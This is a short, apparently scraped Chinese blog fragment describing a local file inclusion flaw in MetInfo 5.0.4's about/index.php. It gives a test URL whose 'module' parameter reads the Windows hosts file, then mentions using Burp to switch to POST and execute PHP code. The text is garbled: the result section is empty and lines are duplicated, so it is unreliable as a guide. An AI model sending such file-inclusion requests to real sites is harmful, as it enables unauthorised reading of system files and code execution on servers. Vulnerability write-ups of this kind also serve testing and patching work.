赞
踩
漏洞出现在about/index.php中,因为利用了动态地址,所以存在漏洞。
漏洞检查语句(!192.168.109.100是我的服务器ip,需要换成自己的):
http://192.168.109.100/MetInfo5.0.4/about/index.php?module=c:/windows/system32/drivers/etc/hosts&fmodule=7
结果:
可以使用burp工具对漏洞进行利用
把GET模式改为POST,执行PHP代码
行利用
把GET模式改为POST,执行PHP代码
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。